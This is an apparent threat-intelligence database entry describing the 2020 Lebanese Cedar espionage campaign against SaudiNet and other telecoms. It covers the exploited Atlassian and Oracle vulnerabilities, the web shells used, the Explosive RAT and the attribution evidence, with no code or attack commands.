Cyber Incident Victim: SaudiNet
Date:
Jan 2020
Location:
Saudi Arabia
Summary
A Hezbollah-affiliated threat actor known as Lebanese Cedar compromised telecommunications providers and ISPs across multiple countries, including SaudiNet, through a campaign exploiting vulnerabilities in internet-facing Atlassian and Oracle servers. Attackers deployed web shells to maintain access and leveraged the Explosive RAT malware to exfiltrate sensitive databases, likely containing client call records and private information, for intelligence-gathering purposes. Security researchers attributed the activity to the group based on tool reuse, operational fingerprints, and infrastructure overlaps across compromised servers globally.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
The incident involving SaudiNet occurred as part of a broader cyber-espionage campaign conducted by the Lebanese Cedar threat actor, a group affiliated with Hezbollah's cyber unit. Beginning in early 2020, the attackers systematically scanned the internet for vulnerable servers using open-source tools, specifically targeting unpatched Atlassian Confluence, Atlassian Jira, and Oracle Fusion systems. They exploited known vulnerabilities—CVE-2019-3396, CVE-2019-11581, and CVE-2012-3152—to gain initial access to internet-facing infrastructure. Upon compromise, the group deployed multiple web shells including ASPXSpy, Caterpillar 2, Mamad Warning, and a JSP file browser tool to maintain persistent access. These web shells facilitated lateral movement into internal networks, where the attackers deployed the Explosive remote access trojan (RAT), a custom malware previously exclusive to Lebanese Cedar operations. The RAT specialized in data exfiltration, enabling theft of sensitive documents and databases.
The campaign impacted at least 254 servers globally, with SaudiNet identified among high-profile victims alongside Vodafone Egypt, Etisalat UAE, and US-based Frontier Communications. Israeli cybersecurity firm ClearSky discovered the intrusions during incident response investigations, attributing the activity to Lebanese Cedar through technical evidence including reused attack files and the exclusive deployment of Explosive RAT. Analysis confirmed attackers accessed telecom databases containing call records and client private data, though specific exfiltrated records from SaudiNet weren't detailed. ClearSky's report noted operational security failures by the attackers, including file reuse across targets, which enabled fingerprinting of infected systems. Of the 254 compromised servers, 135 shared identical file hashes with those observed during ClearSky's forensic analysis. The campaign's primary objective appeared to be intelligence gathering, leveraging stolen telecommunications data for strategic purposes. No remediation actions by SaudiNet or other victims were described in the reporting.